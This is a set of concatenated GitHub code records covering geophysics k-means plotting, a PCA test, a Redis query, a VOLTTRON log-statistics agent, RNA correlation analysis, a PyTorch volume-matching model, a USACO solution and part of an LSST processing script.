plt\n\nimport ytgeotools\nfrom ytgeotools.seismology.collections import DepthSeriesKMeans\n\nvs_file = \"IRIS/wUS-SH-2010_percent.nc\"\nds = ytgeotools.open_dataset(vs_file)\nP = ds.profiler.get_profiles(\"dvs\")\n\nmodel = DepthSeriesKMeans(P, n_clusters=3)\nmodel.fit()\ndf = model.get_classified_coordinates()\ndf.plot(\"labels\")\n\nkmeans_stats = model.depth_stats()\nplt.figure()\nc = [\"r\", \"g\", \"b\", \"c\", \"m\"]\nfor i in range(model.n_clusters):\n minvals = kmeans_stats[i][\"two_sigma_min\"]\n maxvals = kmeans_stats[i][\"two_sigma_max\"]\n plt.plot(model.cluster_centers_[i, :], model.profile_collection.depth, color=c[i])\nplt.gca().invert_yaxis()\n\nplt.show()\n","repo_name":"chrishavlin/ytgeotools","sub_path":"examples/kmeans_profiles.py","file_name":"kmeans_profiles.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74876550866","text":"\nimport datetime\n\nimport numpy\nimport pandas\nimport jax\n\nimport xtuples as xt\nimport xjd\n\n\ndef test_ppca_naive() -> bool:\n xjd.utils.rand.reset_keys()\n\n N = 3\n\n ds = xjd.utils.dates.starting(datetime.date(2020, 1, 1), 100)\n\n N_COLS = 5\n\n vs_norm = xjd.utils.rand.gaussian((100, N,))\n betas = xjd.utils.rand.gaussian((N, N_COLS,))\n vs = numpy.matmul(vs_norm, betas)\n\n NOISE = 1\n\n data = (\n pandas.DataFrame({\n f: xjd.utils.dates.dated_series({d: v for d, v in zip(ds, fvs)})\n for f, fvs in enumerate(numpy.array(vs).T)\n }),\n )\n\n model, loc_data = xjd.Model().add_node(\n xjd.inputs.dfs.DataFrame_Wide(),\n input=True,\n )\n model, loc_weights = model.add_node(\n xjd.params.random.Orthogonal(\n shape=(N_COLS, N + NOISE,)\n )\n )\n model, loc_encode = model.add_node(\n xjd.pca.vanilla.PCA_Encoder(\n data=loc_data.result(),\n weights = loc_weights.param(),\n n=N + NOISE,\n #\n )\n )\n model, loc_decode = model.add_node(\n xjd.pca.vanilla.PCA_Decoder(\n weights = loc_weights.param(),\n factors=loc_encode.result(),\n #\n )\n )\n model = (\n model.add_node(xjd.constraints.loss.MSE(\n l=loc_data.result(),\n r=loc_decode.result(),\n ), constraint=True)\n .add_node(xjd.constraints.linalg.EigenVLike(\n weights = loc_weights.param(),\n factors=loc_encode.result(),\n n_check=N + NOISE,\n ), constraint=True)\n .init(data)\n )\n\n model = model.optimise(data).apply(data)\n \n eigen_vec = weights = loc_weights.param().access(model)\n factors = loc_encode.result().access(model)\n\n cov = jax.numpy.cov(factors.T)\n eigen_vals = jax.numpy.diag(cov)\n\n order = numpy.flip(numpy.argsort(eigen_vals))[:N]\n assert eigen_vals.shape[0] == N + 1, eigen_vals.shape\n\n eigen_vals = eigen_vals[order]\n eigen_vec = eigen_vec[..., order]\n\n eigvals, eigvecs = numpy.linalg.eig(numpy.cov(\n numpy.transpose(data[0].values)\n ))\n _order = numpy.flip(numpy.argsort(eigvals))[:N]\n eigvecs = eigvecs[..., _order]\n # assert False, (eigvals, eigen_vals,)\n\n eigvecs = xjd.utils.funcs.set_signs_to(\n eigvecs, 1, numpy.ones(eigvecs.shape[1])\n )\n eigen_vec = xjd.utils.funcs.set_signs_to(\n eigen_vec, 1, numpy.ones(eigen_vec.shape[1])\n )\n\n print(eigen_vec)\n print(eigvecs)\n\n # for now we just check pc1 matches\n xjd.utils.tests.assert_is_close(\n eigen_vec.real[..., :1],\n eigvecs.real[..., :1],\n True,\n atol=.1,\n )\n return True","repo_name":"tomjrwilliams/xjd","sub_path":"tests/test_ppca_naive.py","file_name":"test_ppca_naive.py","file_ext":"py","file_size_in_byte":2709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"281329514","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport redis \n\nPROVINCE_MAP={\"BeiJing\":\"北京\",\"ShangHai\":\"上海\",\"TianJin\":\"天津\",\"ChongQing\":\"重庆\",\"XiangGang\":\"香港\",\"Aomen\":\"澳门\",\"AnHui\":\"安徽\",\"FuJian\":\"福建\",\"GuangDong\":\"广东\",\"GuangXi\":\"广西\",\"GuiZhou\":\"贵州\",\"GanSu\":\"甘肃\",\"HaiNan\":\"海南\",\"HeBei\":\"河北\",\"HeNan\":\"河南\",\"HeiLongJiang\":\"黑龙江\",\"HuBei\":\"湖北\",\"HuNan\":\"湖南\",\"JiLin\":\"吉林\",\"JiangSu\":\"江苏\",\"JiangXi\":\"江西\",\"LiaoNing\":\"辽宁\",\"NeiMengGu\":\"内蒙古\",\"NingXia\":\"宁夏\",\"QingHai\":\"青海\",\"ShanXi1\":\"山西\",\"ShanXi3\":\"陕西\",\"ShanDong\":\"山东\",\"SiChuan\":\"四川\",\"TaiWan\":\"台湾\",\"XiZang\":\"西藏\",\"XinJiang\":\"新疆\",\"YunNan\":\"云南\",\"ZheJiang\":\"浙江\"}\n\nclass Redis_Query:\n\n def query_province(self):\n r = redis.StrictRedis(host='127.0.0.1', port=6379)\n return r.hgetall('province') \n\n def get_province_price(self,dict):\n china_price={}\n for k,v in dict.items():\n if k in PROVINCE_MAP:\n new_key=PROVINCE_MAP[k]\n china_price[new_key]=v\n return china_price\n","repo_name":"bigdataguide/hadooptraining","sub_path":"visualization/py-echarts/query_redis.py","file_name":"query_redis.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"48"} +{"seq_id":"24552169246","text":"import datetime\nimport logging\nimport os\nimport sys\nimport statistics\n\nfrom volttron.platform.vip.agent import Agent, RPC, Core\nfrom volttron.platform.agent import utils\nfrom volttron.platform.agent.utils import get_aware_utc_now\n\nutils.setup_logging()\n_log = logging.getLogger(__name__)\n__version__ = '1.0'\n\n\ndef log_statistics(config_path, **kwargs):\n \"\"\"Load the LogStatisticsAgent agent configuration and returns and instance\n of the agent created using that configuration.\n\n :param config_path: Path to a configuration file.\n\n :type config_path: str\n :returns: LogStatisticsAgent agent instance\n :rtype: LogStatisticsAgent agent\n \"\"\"\n config = utils.load_config(config_path)\n return LogStatisticsAgent(config, **kwargs)\n\n\nclass LogStatisticsAgent(Agent):\n \"\"\"\n LogStatisticsAgent reads volttron.log file size every hour,\n compute the size delta from previous hour and publish the difference\n with timestamp. It also publishes standard deviation every 24 hours.\n :param config: Configuration dict\n :type config: dict\n\n Example configuration:\n .. code-block:: python\n {\n \"file_path\" : \"/home/volttron/volttron.log\",\n \"analysis_interval_sec\" : 60,\n \"publish_topic\" : \"platform/log_statistics\",\n \"historian_topic\" : \"analysis/log_statistics\"\n }\n \"\"\"\n\n def __init__(self, config, **kwargs):\n super(LogStatisticsAgent, self).__init__(**kwargs)\n self.analysis_interval_sec = config[\"analysis_interval_sec\"]\n self.file_path = config[\"file_path\"]\n self.publish_topic = config[\"publish_topic\"]\n self.historian_topic = config[\"historian_topic\"]\n self.size_delta_list = []\n self.file_start_size = None\n self.prev_file_size = None\n self._scheduled_event = None\n\n @Core.receiver('onstart')\n def starting(self, sender, **kwargs):\n _log.info(\"Starting \" + self.__class__.__name__ + \" agent\")\n self.publish_analysis()\n\n def publish_analysis(self):\n \"\"\"\n Publishes file's size increment in previous time interval (60 minutes)\n with timestamp.\n Also publishes standard deviation of file's hourly size differences\n every 24 hour.\n \"\"\"\n if self._scheduled_event is not None:\n self._scheduled_event.cancel()\n\n if self.prev_file_size is None:\n self.prev_file_size = self.get_file_size()\n _log.debug(\"init_file_size = {}\".format(self.prev_file_size))\n else:\n # read file size\n curr_file_size = self.get_file_size()\n\n # calculate size delta\n size_delta = curr_file_size - self.prev_file_size\n self.prev_file_size = curr_file_size\n\n self.size_delta_list.append(size_delta)\n\n headers = {'Date': datetime.datetime.utcnow().isoformat() + 'Z'}\n\n publish_message = {'timestamp': datetime.datetime.utcnow().isoformat() + 'Z',\n 'log_size_delta': size_delta}\n historian_message = [{\"log_size_delta \": size_delta},\n {\"log_size_delta \": {'units': 'bytes', 'tz': 'UTC', 'type': 'float'}}]\n\n if len(self.size_delta_list) == 24:\n standard_deviation = statistics.stdev(self.size_delta_list)\n publish_message['log_std_dev'] = standard_deviation\n historian_message[0]['log_std_dev'] = standard_deviation\n historian_message[1]['log_std_dev'] = {'units': 'bytes', 'tz': 'UTC', 'type': 'float'}\n\n _log.debug('publishing message {} with header {} on historian topic {}'\n .format(historian_message, headers, self.historian_topic))\n self.vip.pubsub.publish(peer=\"pubsub\", topic=self.historian_topic, headers = headers,\n message=historian_message)\n\n self.size_delta_list = []\n\n _log.debug('publishing message {} on topic {}'.format(publish_message, self.publish_topic))\n self.vip.pubsub.publish(peer=\"pubsub\", topic=self.publish_topic,\n message=publish_message)\n\n _log.debug('Scheduling next periodic call')\n now = get_aware_utc_now()\n next_update_time = now + datetime.timedelta(\n seconds=self.analysis_interval_sec)\n\n self._scheduled_event = self.core.schedule(\n next_update_time, self.publish_analysis)\n\n def get_file_size(self):\n try:\n return os.path.getsize(self.file_path)\n except OSError as e:\n _log.error(e.message)\n\n\ndef main(argv=sys.argv):\n \"\"\"Main method called by the platform.\"\"\"\n utils.vip_main(log_statistics, identity='platform.logstatisticsagent')\n\n\nif __name__ == '__main__':\n # Entry point for script\n try:\n sys.exit(main())\n except KeyboardInterrupt:\n pass\n","repo_name":"cyrus19901/volttron-homeassistant","sub_path":"services/core/LogStatisticsAgent/logstatisticsagent/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":4912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28570483029","text":"import pandas as pd\nfrom scipy import stats\n\nnovel_counts = pd.read_csv('D:\\\\MCGDYY\\\\ont_project\\\\NovelQuant_pipeline\\\\t_exp_median.csv', index_col = 0)\nall_counts_df = pd.read_csv('D:\\\\MCGDYY\\\\ont_project\\\\quantification\\\\all_counts.csv', index_col = 0)\nnovel_t2g = pd.read_csv('D:\\\\MCGDYY\\\\ont_project\\\\lists\\\\all_novel_list.txt', index_col = 0, names = ['gene'], sep = '\\t')\nDE_novel = pd.read_csv('D:\\\\MCGDYY\\\\ont_project\\\\NovelQuant_pipeline\\\\lncRNA\\\\intersec_novel_lncRNA.csv', index_col = 0)\nDE_anno = pd.read_csv('D:\\\\MCGDYY\\\\ont_project\\\\lncRNA\\\\DE_anno_mRNA.csv', index_col = 0)\nanno_t2g = pd.read_csv('D:\\\\MCGDYY\\\\ont_project\\\\lists\\\\anno_mRNA_trans.txt', index_col = 1, names = ['gene', 'xx', 'xxx'], sep = '\\t')\n\nDE_novel_list = list(i.split('_')[0] for i in DE_novel.index)\nclean_novel = pd.DataFrame()\nfor i in DE_novel_list:\n\tclean_novel = pd.concat((clean_novel, novel_counts[i + '_T']), axis = 1)\nclean_novel.columns = [i.split('_')[0] for i in clean_novel.columns]\n\nDE_anno_list = list(DE_anno.index)\nclean_anno = pd.DataFrame()\nall_counts = all_counts_df.T\nfor i in DE_anno_list:\n\tclean_anno = pd.concat((clean_anno, all_counts[i]), axis = 1)\nclean_anno = clean_anno[clean_anno.index.str.contains('-1')]\nclean_anno.index = [i.split('-')[0] for i in clean_anno.index]\nclean_anno = clean_anno.drop(index = '1848')\t# 1848 has no clinical info\n\n# calculate Spearman's correlation\nsum_table = pd.DataFrame()\nsig_table = pd.DataFrame()\nfor i in clean_novel.columns:\n\tg1 = novel_t2g.loc[i, 'gene']\n\tfor k in clean_anno.columns:\n\t\tg2 = anno_t2g.loc[k, 'gene']\n\t\trho, pval = stats.spearmanr(clean_novel[i], clean_anno[k])\n\t\tsum_table.loc[k + '_rho', i] = rho\n\t\tsum_table.loc[k + '_pval', i] = pval\n\n\t\t# remove comparison inside the same gene\n\t\tif g1 != g2:\n\t\t\tif abs(rho) > 0.8 and pval < 0.05:\n\t\t\t\tsig_table.loc[k, i] = str(rho) + ', ' + str(pval)\nsum_table.to_csv('D:\\\\MCGDYY\\\\ont_project\\\\NovelQuant_pipeline\\\\lncRNA\\\\all_cor_novel_anno.csv')\t\t\t\t\nsig_table.to_csv('D:\\\\MCGDYY\\\\ont_project\\\\NovelQuant_pipeline\\\\lncRNA\\\\raw_sig_cor_novel_anno.csv')\n\n# annotate results\nnovel_names = pd.read_csv('D:\\\\MCGDYY\\\\ont_project\\\\lists\\\\all_novel_list.txt', index_col = 0, header = None, sep = '\\t')\ntrans_2_gene = pd.read_csv('D:\\\\MCGDYY\\\\ont_project\\\\lists\\\\all_trans_to_gene_list.txt', index_col = 0, header = None, sep = '\\t')\nfinal_table = pd.DataFrame(columns = ['novel', 'parent_gene_ensembl', 'parent_gene', 'anno_ensembl', 'anno', 'rho', 'p-value'])\n\nfor i in sig_table.columns:\n\tfor k in sig_table.index:\n\t\tif pd.isnull(sig_table.loc[k, i]) is False:\n\t\t\tcur_len = len(final_table)\n\t\t\tfinal_table.loc[cur_len, 'novel'] = i\n\t\t\tparent_gene_ensembl = novel_names.loc[i, 1]\n\t\t\tfinal_table.loc[cur_len, 'parent_gene_ensembl'] = parent_gene_ensembl\n\t\t\ttry:\n\t\t\t\tparent_gene = trans_2_gene.loc[parent_gene_ensembl, 2].values[0]\n\t\t\texcept AttributeError:\n\t\t\t\tparent_gene = trans_2_gene.loc[parent_gene_ensembl, 2]\n\t\t\tfinal_table.loc[cur_len, 'parent_gene'] = parent_gene\n\t\t\tfinal_table.loc[cur_len, 'anno_ensembl'] = k\n\t\t\tfinal_table.loc[cur_len, 'anno'] = trans_2_gene[trans_2_gene[1] == k].iloc[0, 2]\n\t\t\tfinal_table.loc[cur_len, 'rho'] = sig_table.loc[k, i].split(',')[0]\n\t\t\tfinal_table.loc[cur_len, 'p-value'] = sig_table.loc[k, i].split(',')[1]\nfinal_table.to_csv('D:\\\\MCGDYY\\\\ont_project\\\\NovelQuant_pipeline\\\\lncRNA\\\\compiled_sig_cor_novel_anno.csv', index = False)","repo_name":"indigoblueraspberry/ONT_RNAseq_project","sub_path":"analyze_novel_lncRNA/cor_DE_novel_and_anno.py","file_name":"cor_DE_novel_and_anno.py","file_ext":"py","file_size_in_byte":3375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37370839696","text":"import numpy as np\nfrom numpy.linalg import norm\nimport torch\nfrom torch import nn, optim\nimport torch.nn.functional as F\nfrom omegaconf import DictConfig\nfrom pathlib import Path\nfrom utils import get_device, init_logs_dir, center_crop\nfrom utils.torch_utils import weight_init\nfrom torch.utils.tensorboard import SummaryWriter\n\nclass VolEncoder(nn.Module):\n \"\"\"\n in_shape: (B, C, T, H, W) \n out_shape: (B, C, T, H, W) \n \"\"\"\n def __init__(self, kernel_dim, init_weight=False, lite=False):\n \"\"\"Initialize the layers of the network as instance variables.\"\"\"\n super(VolEncoder, self).__init__()\n self.lite=lite\n self.maxpool = nn.MaxPool3d(2, 2)\n\n self.convd1 = nn.Conv3d(1, 16, 3, stride=1, padding=1)\n self.convd2 = nn.Conv3d(16, 32, 3, stride=2, padding=1)\n self.convd3 = nn.Conv3d(32, 64, 3, stride=2, padding=1)\n self.convd4 = nn.Conv3d(64, 128, 3, stride=2, padding=1)\n\n self.convb_lite = nn.Conv3d(64, 128, 3, stride=2, padding=1)\n self.convb = nn.Conv3d(128, 256, 3, stride=2, padding=1)\n\n self.convu1 = nn.Conv3d(384, 128, 3, stride=1, padding=1)\n self.convu2 = nn.Conv3d(192, 64, 3, stride=1, padding=1)\n self.convu3 = nn.Conv3d(96, 32, 3, stride=1, padding=1)\n self.convf = nn.Conv3d(32, kernel_dim, 1, stride=1, padding=0)\n\n if init_weight:\n self.apply(weight_init)\n\n def forward(self, x):\n \n xd1 = F.relu(self.convd1(x))\n xd2 = F.relu(self.convd2(xd1))\n xd3 = F.relu(self.convd3(xd2))\n if not self.lite:\n xd4 = F.relu(self.convd4(xd3))\n xb = F.relu(self.convb(xd4))\n xu1 = F.relu(self.convu1(torch.cat((xd4, F.interpolate(xb, scale_factor=(2,2,2))), 1)))\n else:\n xu1 = F.relu(self.convb_lite(xd3))\n\n xu2 = F.relu(self.convu2(torch.cat((xd3, F.interpolate(xu1, scale_factor=(2,2,2))), 1)))\n xu3 = F.relu(self.convu3(torch.cat((xd2, F.interpolate(xu2, scale_factor=(2,2,2))), 1)))\n\n output = self.convf(xu3)\n return output\n\nclass VolMatchTransport(nn.Module):\n \"\"\"Transport module.\"\"\"\n\n def __init__(self, \n max_perturb_delta, part_shape, kit_shape, vox_size, kit_padding,\n logs_dir, logger, \n dist_aware_loss, lite=False, upsample=False, device=None):\n \"\"\"Transport module for placing.\n\n Args:\n max_perturb_delta: max purturbations (number of voxels)\n \"\"\"\n super().__init__()\n # print(f'transporter upsample : {upsample}')\n self.device = get_device() if device is None else device\n\n self.part_shape = np.array(part_shape)\n self.kit_shape = np.array(kit_shape)\n self.vox_size = vox_size * 1000 # unit is mm\n self.kit_padding = kit_padding\n # make sure shapes are multiple of 16, and kit is larger than obj\n assert np.all(self.part_shape%16==0) and np.all(self.kit_shape%16==0), \\\n f'expected kit and obj shapes to be multiples of 4 but get {part_shape}, {kit_shape}'\n assert np.all(self.part_shape < self.kit_shape), \\\n f'expected obj shape to be smaller than kit shape but get {part_shape} >= {kit_shape}'\n\n # max perturbations\n self.max_perturb_delta = np.array(max_perturb_delta)\n # kernel dimention for cross-conv\n self.kernel_dim = 6\n # setup\n self.lite = lite\n self.upsample = upsample\n\n # volume encoders and optimizer\n self.querynet = VolEncoder(self.kernel_dim, lite=lite).to(self.device)\n self.keynet = VolEncoder(self.kernel_dim, lite=lite).to(self.device)\n params = list(self.querynet.parameters()) + list(self.keynet.parameters())\n if self.upsample:\n self.conv_upsample = nn.Conv3d(1, 16, 3, stride=1, padding=1).to(self.device)\n self.conv_out = nn.Conv3d(16, 1, 1, stride=1, padding=0).to(self.device)\n params += list(self.conv_upsample.parameters()) + list(self.conv_out.parameters())\n self.optim = optim.Adam(params, lr=1e-4)\n self.dist_aware_loss = dist_aware_loss\n\n self.logs_dir = logs_dir\n self.logger = logger\n self.train_step = 0\n\n @staticmethod\n def from_cfg(vm_cfg: DictConfig, vox_size: float, load_model: bool = False, log=True, model_path=None):\n p0_vol_shape = vm_cfg.p0_vol_shape_transport\n p1_vol_shape = vm_cfg.p1_vol_shape_transport\n max_perturb_delta = vm_cfg.max_perturb_delta\n no_user_input = vm_cfg.no_user_input\n kit_padding = (0,)*6\n if no_user_input:\n kit_padding = (8,)*6\n p1_vol_shape = [400,400,256]\n max_perturb_delta = np.array([144, 144, 88])\n dist_aware_loss = vm_cfg.dist_aware_loss\n lite = vm_cfg.lite\n upsample = vm_cfg.upsample\n upsample_str = \"_up\" if upsample else \"\"\n logs_dir, logger = None, None\n if log:\n logs_dir = init_logs_dir(vm_cfg, f'{vm_cfg.vol_type}_transport{upsample_str}_full')\n logger = SummaryWriter(logs_dir / \"tensorboard\")\n model = VolMatchTransport(max_perturb_delta, p0_vol_shape, p1_vol_shape, vox_size, kit_padding,\n logs_dir, logger, dist_aware_loss, lite, upsample)\n if load_model:\n if model_path is None:\n model.load(Path(vm_cfg.transporter_path))\n else:\n model.load(Path(model_path))\n return model\n\n def translate(self, part_vol, kit_vol, train=False):\n self.train(train)\n batch_size = part_vol.shape[0]\n kernel = self.querynet(part_vol) # (B, self.kernel_dim, t, h, w)\n kit_vol = F.pad(kit_vol, self.kit_padding, \"constant\", 1)\n logits = self.keynet(kit_vol) # (B, self.kernel_dim, T, H, W)\n kernel_paddings = (0,1,)*3\n kernel = F.pad(kernel, kernel_paddings, mode='constant', value=0)\n half_conv_size = (self.part_shape//2 + self.max_perturb_delta)//2\n sH, sW, sD = np.array(logits.shape[2:5])//2 - half_conv_size\n eH, eW, eD = np.array(logits.shape[2:5])//2 + half_conv_size\n logits = logits[:,:,sH:eH,sW:eW,sD:eD]\n output = F.conv3d(logits.view(1, batch_size*self.kernel_dim, *logits.shape[2:5]), \n kernel, groups=batch_size) # (1, B, T-t, H-h, W-w)\n output = output.squeeze(0) # (B, T-t, H-h, W-w)\n if self.upsample:\n output = output.unsqueeze(1) # (B, 1, T-t, H-h, W-w)\n output = F.relu(self.conv_upsample(output))\n output = self.conv_out(F.interpolate(output, scale_factor=(2,2,2)))\n output = output.squeeze(1)\n return output\n \n def forward(self, part_vol, kit_vol, train):\n self.train(train)\n part_vol, kit_vol = part_vol.to(self.device).float(), kit_vol.to(self.device).float()\n translate_logits = self.translate(part_vol, kit_vol, train=train)\n # get predictions\n batch_size, search_shape = translate_logits.shape[0], translate_logits.shape[1:4]\n p_crop_pred = np.zeros((batch_size, 3))\n for i in range(batch_size):\n index = torch.argmax(translate_logits[i]).detach().cpu()\n p_crop_pred[i] = np.unravel_index(index, search_shape)\n # lgts = translate_logits[i].detach().cpu().numpy()\n # p_crop_pred[0] = np.unravel_index(np.argmax(lgts), search_shape)\n # for j in range(1,3):\n # x, y, z = np.arange(0, search_shape[0]), np.arange(0, search_shape[1]), np.arange(0, search_shape[2])\n # cx, cy, cz = p_crop_pred[j-1]\n # r = 50\n # mask = (x[:,np.newaxis, np.newaxis,]-cx)**2 + (y[np.newaxis, :, np.newaxis]-cy)**2 + (z[np.newaxis, np.newaxis, :]-cz)**2 < r**2\n # lgts[mask] = 0\n # p_crop_pred[j] = np.unravel_index(np.argmax(lgts), search_shape)\n scale_factor = 1 if self.upsample else 2\n p_pred = p_crop_pred * scale_factor \\\n + self.kit_shape[np.newaxis, Ellipsis]//2 \\\n - self.max_perturb_delta[np.newaxis, Ellipsis]\n return translate_logits, p_pred\n\n def calc_loss(self, p_gt, p_pred, translate_logits):\n batch_size, search_shape = translate_logits.shape[0], translate_logits.shape[1:4]\n # calculate gt position in cropped space\n scale_factor = 1 if self.upsample else 2\n p_crop_gt = (p_gt - self.kit_shape[np.newaxis, Ellipsis]//2 + self.max_perturb_delta) // scale_factor\n p_gt_ind = np.zeros(batch_size)\n for i in range(batch_size):\n x, y, z = p_crop_gt[i]\n p_gt_ind[i] = (x*search_shape[1] + y)*search_shape[2] + z\n p_gt_ind = torch.tensor(p_gt_ind).to(self.device).long()\n loss = F.cross_entropy(translate_logits.reshape(batch_size,-1), p_gt_ind)\n gamma = 1\n if self.dist_aware_loss:\n diff = p_gt - p_pred\n avg_norm = sum([norm(v) for v in diff])/diff.shape[0]\n factor = torch.tensor(avg_norm/norm(self.max_perturb_delta))\n gamma = (torch.exp(factor)-1)\n return loss*gamma\n \n def run(self, sample, training=False, log=True, calc_loss=True):\n p0_vol_full, p1_vol_full, p1_coords, p1_coords_user, p1_ori, _, _ = sample.values()\n if training: # return on gt out of range\n half_search_size = self.max_perturb_delta[np.newaxis, Ellipsis]\n val = p1_coords - p1_coords_user + half_search_size\n if (val<0).any() or ((val-half_search_size*2)>=0).any():\n # print(f'Transport: invalid gt: {val}')\n return None, None, None, None\n # crop kit volumes around user provided centers\n batch_size = p0_vol_full.shape[0]\n p0_vol = torch.empty(batch_size, *self.part_shape)\n p1_vol = torch.empty(batch_size, *self.kit_shape)\n part_crop_center = np.array(p0_vol_full.shape[1:4])//2\n if torch.is_tensor(p1_coords_user):\n p1_coords_user = p1_coords_user.detach().cpu().numpy()\n if torch.is_tensor(p1_coords):\n p1_coords = p1_coords.detach().cpu().numpy()\n for i in range(batch_size):\n p0_vol[i] = center_crop(p0_vol_full[i], part_crop_center, self.part_shape)\n p1_vol[i] = center_crop(p1_vol_full[i], p1_coords_user[i], self.kit_shape)\n\n p0_vol, p1_vol = p0_vol.unsqueeze(1), p1_vol.unsqueeze(1) # add in channel dim\n translate_logits, p_pred = self.forward(p0_vol, p1_vol, train=training)\n p_gt = None\n if p1_coords is not None:\n p_gt = p1_coords - p1_coords_user + self.kit_shape[np.newaxis, Ellipsis]//2\n p_diff, loss_cpu = None, None\n if p_gt is not None:\n diff = p_gt - p_pred\n p_diff = sum([norm(v) for v in diff])/diff.shape[0]\n if calc_loss:\n loss = self.calc_loss(p_gt, p_pred, translate_logits)\n loss_cpu = loss.cpu().detach().item()\n if training:\n self.optim.zero_grad()\n loss.backward()\n self.optim.step()\n self.train_step += 1\n if log:\n # print(f'p_diff: {p_diff:.3f}, p_gt: {p_gt}, p_pred: {p_pred}')\n self.log(loss_cpu, p_diff)\n p_diff *= self.vox_size \n\n p_pred = p_pred + p1_coords_user - np.array(self.kit_shape//2)\n return loss_cpu, p_pred, None, p_diff\n\n def log(self, loss, p_diff):\n if self.logger == None:\n return\n log_dic = {\n 'total_loss': loss,\n 'p_diff': p_diff,\n }\n for k, v in log_dic.items():\n self.logger.add_scalar(k, v, self.train_step)\n\n def load(self, transport_fname):\n print(f'Loaded from {transport_fname}')\n checkpoint = torch.load(transport_fname, map_location=self.device)\n self.keynet.load_state_dict(checkpoint['keynet_state_dict'])\n self.querynet.load_state_dict(checkpoint['querynet_state_dict'])\n if self.upsample:\n self.conv_upsample.load_state_dict(checkpoint['conv_upsample'])\n self.conv_out.load_state_dict(checkpoint['conv_out'])\n self.train_step = checkpoint['train_step']\n\n def save(self):\n state = {'keynet_state_dict': self.keynet.state_dict(),\n 'querynet_state_dict': self.querynet.state_dict(),\n 'train_step': self.train_step}\n if self.upsample:\n state['conv_upsample'] = self.conv_upsample.state_dict()\n state['conv_out'] = self.conv_out.state_dict()\n path = self.logs_dir/f\"{self.train_step}_transporter.pth\"\n torch.save(state, path)\n print(f\"Model saved at path: {path}\")\n\nif __name__ == \"__main__\":\n model = VolEncoder(3, lite=True)\n volume = torch.rand(1,1,32,32,32)\n out = model(volume)\n print(out.shape)\n model = VolEncoder(3, lite=False)\n volume = torch.rand(1,1,32,32,32)\n out = model(volume)\n print(out.shape)","repo_name":"columbia-ai-robotics/SEaT","sub_path":"learning/vol_match_transport.py","file_name":"vol_match_transport.py","file_ext":"py","file_size_in_byte":13045,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"1857394984","text":"file=open('lifeguards.in','r')\nn=int(file.readline())\nshifts=[]\nfor i in range(n):\n arr = [int(x) for x in file.readline().split()]\n shifts.append(arr)\ndef calc(shifts,miss):\n points=[0]*1000\n for i in range(len(shifts)):\n for j in range(shifts[i][0],shifts[i][1]):\n if i!=miss:\n points[j]=1\n x=points.count(1)\n return x\nans=0\nfile.close()\nfor a in range(n):\n tot=calc(shifts,a)\n ans=max(ans,tot)\nprint(ans)\no=open('lifeguards.out','w')\no.write(str(ans))\no.close()\n","repo_name":"funnoodle11/USACO","sub_path":"2018JanBronze/lifeguards.py","file_name":"lifeguards.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28295599999","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport multiprocessing\nimport collections\n\nimport lsst.pex.logging as pexLog\nimport lsst.obs.lsstSim as lsstSim\nimport lsst.pipette.config as pipConfig\nimport lsst.pipette.processCcd as pipProcCcd\nimport lsst.pipette.options as pipOptions\nimport lsst.pipette.catalog as pipCatalog\nimport lsst.pipette.readwrite as pipReadWrite\n\nInputs = collections.namedtuple('Inputs', ['rerun', 'visit', 'snap', 'raft', 'sensor', 'config', 'log'])\n\ndef run(inputs):\n rerun = inputs.rerun\n visit = inputs.visit\n snap = inputs.snap\n raft = inputs.raft\n sensor = inputs.sensor\n config = inputs.config\n log = inputs.log\n\n pexLog.Log.getDefaultLog().addDestination(log)\n\n io = pipReadWrite.ReadWrite(lsstSim.LsstSimMapper, ['visit', 'snap', 'raft', 'sensor'],\n fileKeys=['visit', 'snap', 'raft', 'sensor', 'channel'], config=config)\n roots = config['roots']\n basename = os.path.join(roots['output'], '%s-%d-%d-%s-%s' % (rerun, visit, snap, raft, sensor))\n ccdProc = pipProcCcd.ProcessCcd(config=config, log=pexLog.Log.getDefaultLog())\n dataId = {'visit': visit, 'snap': snap, 'raft': raft, 'sensor': sensor}\n\n detrends = io.detrends(dataId, config)\n if len([x for x in detrends if x]): # We need to run at least part of the ISR\n raws = io.readRaw(dataId)\n else:\n io.fileKeys = ['visit', 'raft', 'sensor']\n raws = io.read('calexp', dataId)\n detrends = None\n\n exposure, psf, brightSources, apcorr, sources, matches, matchMeta = ccdProc.run(raws, detrends)\n \n io.write(dataId, exposure=exposure, psf=psf, sources=sources, matches=matches, matchMeta=matchMeta)\n\n catPolicy = os.path.join(os.getenv(\"PIPETTE_DIR\"), \"policy\", \"catalog.paf\")\n catalog = pipCatalog.Catalog(catPolicy, allowNonfinite=False)\n if sources is not None:\n catalog.writeSources(basename + '.sources', sources, 'sources')\n if matches is not None:\n catalog.writeMatches(basename + '.matches', matches, 'sources')\n return\n\ndef getConfig(overrideFile=None):\n \"\"\"Return a proper config object, maybe given the name of policy file with an additional set of overrides\"\"\"\n \n default = os.path.join(os.getenv(\"PIPETTE_DIR\"), \"policy\", \"ProcessCcdDictionary.paf\")\n overrides = os.path.join(os.getenv(\"PIPETTE_DIR\"), \"policy\", \"lsstSim.paf\")\n config = pipConfig.configuration(default, overrides)\n if overrideFile:\n config.merge(pipConfig.Config(overrideFile))\n\n return config\n\ndef require(value, name):\n if value is None:\n print >> sys.stderr, \"Please specify %s\" % name\n sys.exit(1)\n \n\nif __name__ == \"__main__\":\n parser = pipOptions.OptionParser()\n parser.add_option(\"-R\", \"--rerun\", default=os.getenv(\"USER\", default=\"rerun\"), dest=\"rerun\",\n help=\"Rerun name (default=%default)\")\n parser.add_option(\"-v\", \"--visit\", type=\"int\", dest=\"visit\", help=\"Visit to run\")\n 